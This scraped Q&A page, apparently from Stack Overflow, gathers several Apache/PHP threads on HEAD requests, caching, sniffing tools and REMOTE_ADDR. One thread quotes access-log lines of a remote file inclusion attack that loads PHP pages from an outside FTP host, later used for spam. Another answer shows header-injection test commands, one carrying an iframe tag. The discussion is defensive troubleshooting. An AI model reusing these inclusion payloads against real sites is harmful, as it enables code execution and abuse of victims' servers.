Does Apache pass a malformed HEAD request to PHP? - php

Please consider the below request from apache access log.
119.63.193.131 - - [03/Oct/2013:19:22:19 +0000] "HEAD /blah/blahblah/ HTTP/1.1" 301 - "-" "\"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)\""
Does this request comply with the RFC / standard?
Would Apache pass malformed HEAD requests to PHP?
My configuration is Apache 2.2.15, mod_fcgid 2.3.7, PHP 5.3.3, Linux 2.6.32.60-40 x64, CentOS 6.4

I see nothing obviously wrong about the request in that log entry. It has an unusual user agent (with double quotes in it), but that doesn't make it malformed - it's perfectly valid, and Apache would certainly pass it on to PHP.

I have done fair few RESTful APIs with PHP and apache; never came across any such issues. Best would be to isolate the part that you want to doubly make sure to be working, which in your case is PHP and apache. So put together a basic PHP script that would dump $_SERVER and apache_request_headers() (may be other global variables) which would give you enough clue as to whether it is working or not. use curl -I option for a command line HTTP client; you may also use -v option to see exactly what happens from the client's perspective.

Related

User create folder in FTP from HTML

I'm facing a big problem and I can't find the cause. I have a website running in apache in port 80 with ftp access.
Some user is creating FTP folders with malicious commands. I analysed the apache log and found the following strange lines:
[08/Jul/2016:22:54:09 -0300] "POST /index.php?pg=ftp://zkeliai:zkeliai#zkeliai.lt/Thumbr.php?x&action=upload&chdir=/home/storage/9/ff/8d/mywebsite/public_html/Cliente/ HTTP/1.1" 200 18391 "http://mywebsite/index.php?pg=ftp://zkeliai:zkeliai#zkeliai.lt/Thumbr.php?x&chdir=/home/storage/9/ff/8d/mywebsite/public_html/Cliente/" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
In my FTP the following folder was created: /public_html/Cliente
I have a piece in my code that uses $_GET['pg'], see:
$pg = isset($_GET['pg']) ? $_GET['pg'] : null;
$pg = htmlspecialchars($pg, ENT_QUOTES);
I tried test the command "pg=ftp://zkeliai..." like hacker did, but nothing happens, and I expected this. I'm very confused in how hacker the created a folder in my FTP.
Without knowing what $pg is being used for, it's not really possible to get what the hacker is doing, but it looks like he send a POST request to index.php with the parameters
?pg=ftp://zkeliai:zkeliai#zkeliai.lt/Thumbr.php?x&chdir=/home/storage/9/ff/8d/mywebsite/public_html/Cliente/
The effect of your sanitation with htmlspecialchars is to convert the one & in the string to &. When the request is processed by index.php, but, it will be converted back to & in an internal string as PHP will assume it was just URL encoded, so when index.php is sending its server-side request to Thumbr.php, the & is present and serves to send parameters to the FTP.
We had a similar issue on our university's site. We have over 2200 hits the last few days from this IP with two different .php pages: showcase.php and Thumbr.php
Here's a snippet from our log
POST /navigator/index.php page=ftp://zkeliai:zkeliai#zkeliai.lt/zkeliai/showcase.php? 80 - 177.125.20.3 Mozilla/4.0+(compatible;+MSIE+7.0;+Windows+NT+6.1;+WOW64;+Trident/4.0;+SLCC2;+.NET+CLR+2.0.50727;+.NET+CLR+3.5.30729;+.NET+CLR+3.0.30729;+Media+Center+PC+6.0;+.NET4.0C;+.NET4.0E) 200 0 0 11154
This page was used to send spam through our SMTP server. The page= GET parameter in the URL was being loaded by our PHP page with no filtering on the value. The showcase.php page (no longer on the FTP site) was a simple HTML form with a field for a subject, a field for HTML body contents, and a text area for email recipients.
Without being sure what was posted, it seems loading the ftp page (with the included credentials) into PHP with the $_GET[] managed to execute the content on that page? I'm unclear as to how that may work, but that seems to be what happened.

Mac doesn't update fast when programming PHP

I have this weird problem, and I don't know how to get rid of it.
Example: I put a var_dump('test') in my code at the top of the page. Just to edit something.
Alt-tab to chrome, cmd-R to refresh.
The var_dump('test')is not there. Cmd-R again. Still not there.
Then I wait for a minute, and refresh... And suddenly it's there.
Basically: I will always see code changes, but not immediately.
I have this problem in PhpStorm and Netbeans, so it's probably not an IDE problem.
Edit: I have also tried this in different browsers, and they all have this as well, so it's not a browser-related problem.
Has anyone had this problem before? Does anyone know a solution to this?
It's really difficult to work efficiently if I have to wait to see my edited code live...
EDIT:
I'm working on my localhost. Server setup is with MAMP.
REQUEST HEADERS:
Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding:gzip,deflate,sdch
Accept-Language:nl-NL,nl;q=0.8,en-US;q=0.6,en;q=0.4
Cache-Control:no-cache
Connection:keep-alive
Cookie:projekktorplayertracking_prkusruuid=D1A39803-4DE3-4C0B-B199-6650CF0F8DE5; Akamai_AnalyticsMetrics_clientId=C355983152DF60151A0C6375798CD52E8F09B995; __atuvc=4%7C47%2C0%7C48%2C0%7C49%2C17%7C50%2C47%7C51; PHPSESSID=885c62f543097973d17820dca7b3a526; __utma=172339134.2012691863.1384502289.1387377512.1387442224.41; __utmb=172339134.1.10.1387442224; __utmc=172339134; __utmz=172339134.1384502289.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
Host:local.sos
Pragma:no-cache
User-Agent:Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
RESPONSE HEADERS:
Connection:Keep-Alive
Content-Length:681
Content-Type:text/html
Date:Thu, 19 Dec 2013 09:00:54 GMT
Keep-Alive:timeout=5, max=99
Server:Apache/2.2.25 (Unix) mod_ssl/2.2.25 OpenSSL/0.9.8y DAV/2 PHP/5.5.3
X-Pad:avoid browser bug
X-Powered-By:PHP/5.5.3
EDIT:
I was messing around in MAMP's settings. My PHP version was 5.5.3, but then I couldn't set any PHP Extensions.
When I put PHP version on 5.2.17 (my only other option), I was able to set Cache to XCache.
So... Now my page is always up-to-date when reloaded immediately.
Thanks to anyone that replied and helped me with this!
This was the solution:
I was messing around in MAMP's settings. My PHP version was 5.5.3, but then I couldn't set any PHP Extensions.
When I put PHP version on 5.2.17 (my only other option), I was able to set Cache to XCache.
Then it worked.
But then I found this thread.
In your MAMP Dir go to : /bin/php/php5.5.3/conf/php.ini
And comment the Opcahe lines:
[OPcache]
;zend_extension="/Applications/MAMP/bin/php/php5.5.3/lib/php/extensions/no-debug-non-zts-20121212/opcache.so"
; opcache.memory_consumption=128
; opcache.interned_strings_buffer=8
; opcache.max_accelerated_files=4000
; opcache.revalidate_freq=60
; opcache.fast_shutdown=1
; opcache.enable_cli=1
Now I'm programming in PHP 5.5.3, and my pages are immediately updated.
There are three possible causes (I can think of):
Your browser is caching the file, on development sites you can disable your cache (eg in Chrome press F12 and click on the gear in the bottom right, check the checkbox to disable cache while developer tools are open - keep it open in development areas)
Your connection to your server is lagging, this can be caused by delayed uploads by your IDE or by your connection. You can test this by opening a SSH connection and check modified times after saving (eg; repeatedly pressing ls -la or watch -n 1 ls -la in the directory of the file)
In case of some applications another form of caching might exist. This can be APC or Opcache. In order for this to be the possible cause it might be wise to exclude the above first. This step requires you to analyze the headers send by the server as available on the Network tab of the devtools (in case of chrome)
Not sure about NetBeans, but PhpStorm updates the file as you type (there is no need to explicitly save). HOWEVER, the auto-save debounce is OS dependant. Mac might wait for file changes slower to refresh their contents. I'm not sure how to do it on OS X, because I can't recall the name of the feature but another workaround is to explicitly save the file using Command+S.
I had a similar sounding problem working locally with .php and .less files in IE and Chrome. Something was causing the css file to be cached or cookied or something and wouldn't display the changes made to the .less file. We fixed it by creating a php variable of the time stamp and then attaching the variable to the end of the file name and source link. The browser treated it like a new file and would always load it.
I don't have the actual code to do that right now (I'm at home) but will look for it tomorrow at work.
Obviously, this isn't the same problem you're having, but I thought it might give you a new direction to research your issue.

Strange behavior on Linux (php/mysql)

We're having strange behavior on our linux server. Here are some symptoms:
1) PHP using old information when processing scripts:
For example: I loaded up the site today and it ran the mobile version of our Joomla 2.5.9 template instead of the normal template. I looked through the access log and two minutes before I loaded the site up an iPhone had accessed the site. So, for some reason the PHP code ‘thought’ that my access was still the iPhone. Here’s a snip from the access log.
74.45.141.88 - - [01/Mar/2013:07:39:24 -0800] "GET / HTTP/1.1" 200 9771 "https://m.facebook.com" "Mozilla/5.0 (iPhone; CPU iPhone OS 6_1 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Mobile/10B141 [FBAN/FBIOS;FBAV/5.5;FBBV/123337;FBDV/iPhone2,1;FBMD/iPhone;FBSN/iPhone OS;FBSV/6.1;FBSS/1; FBCR/AT&T;FBID/phone;FBLC/en_US;FBOP/0]"
...
63.224.42.234 - - [01/Mar/2013:07:43:45 -0800] "GET / HTTP/1.1" 200 9771 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:19.0) Gecko/20100101 Firefox/19.0"
2) Links on the site are sometimes being generated within Joomla differently: sometimes "ww.sitename.com" or just "sitename.com" when it should be "www.sitename.com".
3) When I make a configuration change to the site (within Joomla administration), it doesn't always take immediately, though it should. For instance, when click publish something using the user interface, it will still be published for quite a while after I unpublished it. During a problem like this, I have tried restarting both Apache and MySQL and it didn't help. I had to wait until something updated. Eventually it does update.
4) The php session doesn't consistently work. We have code that generates a captcha from a session variable. The code fails sometimes rendering the captcha inoperable.
All the above is totally inconsistent. Sometimes it wigs out other times it doesn't. Also, note that the site works totally fine on our dev.sitename.com. We even tried to switch the Apache webserver configuration from our dev.sitename.com to our sitename.com. And the problem still persists.
Thank you.
I had a similar problems with magento CMS in my case the problem was cache used by magento. Disabling the caching functionality had solved the problem.

Program for windows which can display HTTP request made by PHP?

Like firebug shows ajax request made by javascript is there any similar tool for windows which can show http request made through CURL from PHP while working locally on WAMP ?
Thanks.
http://www.wireshark.org/ or http://www.effetech.com/sniffer/
Also see other answers
https://stackoverflow.com/questions/1437038/http-and-https-sniffer-for-windows
How to sniff http requests
Google "HTTP Analyzer", "Protocol Analyzer", "HTTP Sniffer" etc for alternatives.
Do you want the HTTP headers?
If you have curl on windows,
curl http://example.com -D -
gives you the HTTP headers also. ( the '-' after the '-D' tell it to spit it to stdout (works on *nix, not sure about windows) , you can replace the '-' with a filename
eg:
curl http://example.com -D headers.txt
)
Or you can look it up on the other side of the universe with Apache access logs (as you are working locally). I dont have Windows here, but you might have to configure it to log,
http://httpd.apache.org/docs/1.3/logs.html#accesslog
Fiddler should be able to catch curl too, and it has a quite complete interface.

Is it possible that REMOTE_ADDR could be blank?

As far as I'm aware, the webserver (Apache/Nginx) provides the ($_SERVER['REMOTE_ADDR']) based on the claimed location of the requesting user agent. So I understand they can be lying, but is it possible that this value could be blank? Would the network interface or webserver even accept a request without a correctly formed IP?
http://php.net/manual/en/reserved.variables.server.php
It is theoretically possible, as the matter is up to the http server or at least the corresponding PHP SAPI.
In practice, I haven't encountered such a situation, except with the CLI SAPI.
EDIT: For Apache, it would seem this is always set, as ap_add_common_vars always adds it to the table that ends up being read by the Apache module PHP SAPI (disclaimer: I have very limited knowledge of Apache internals).
If using PHP in a CGI environment, the specification in RFC 3875 seems to guarantee the existence of this variable:
4.1.8. REMOTE_ADDR
The REMOTE_ADDR variable MUST be set to the network address of the
client sending the request to the server.
Yes. I currently see values of "unknown" in my logs of Apache-behind-Nginx, for what looks like a normal request/response sequence in the logs. I believe this is possible because mod_extract_forwarded is modifying the request to reset REMOTE_ADDR based on data in the X-Forwarded-For header. So, the original REMOTE_ADDR value was likely valid, but as part of passing through our reverse proxy and Apache, REMOTE_ADDR appears invalid by the time it arrives at the application.
If you have installed Perl's libwww-perl, you can test this situation like this (changing example.com to be your own domain or application):
HEAD -H 'X-Forwarded-For: ' -sSe http://www.example.com/
HEAD -H 'X-Forwarded-For: HIMOM' -sSe http://www.example.com/
HEAD -H 'X-Forwarded-For: <iframe src=http://example.com>' -sSe http://www.example.com/
( You can also use any other tool that allows you to handcraft HTTP requests with custom request headers. )
Now, go check your access logs to see what values they logged, and check your applications to see how they handled the bad input. `
Well, it's reserved but writable. I've seen badly written apps that were scribbling all over the superglobals - could the script be overwriting it, e.g. with $_SERVER['REMOTE_ADDR'] = '';?
Other than that, even if the request were proxied, there should be the address of the proxy - could it be some sort of internal-rewrite module messing with it (mod_rewrite allows internal redirects, not sure if it affects this)?
It shouldn't be blank, and nothing can't connect to your web service. Whatever's connecting must have an IP address to send and receive data. Whether that IP address can be trusted is a different matter.

Categories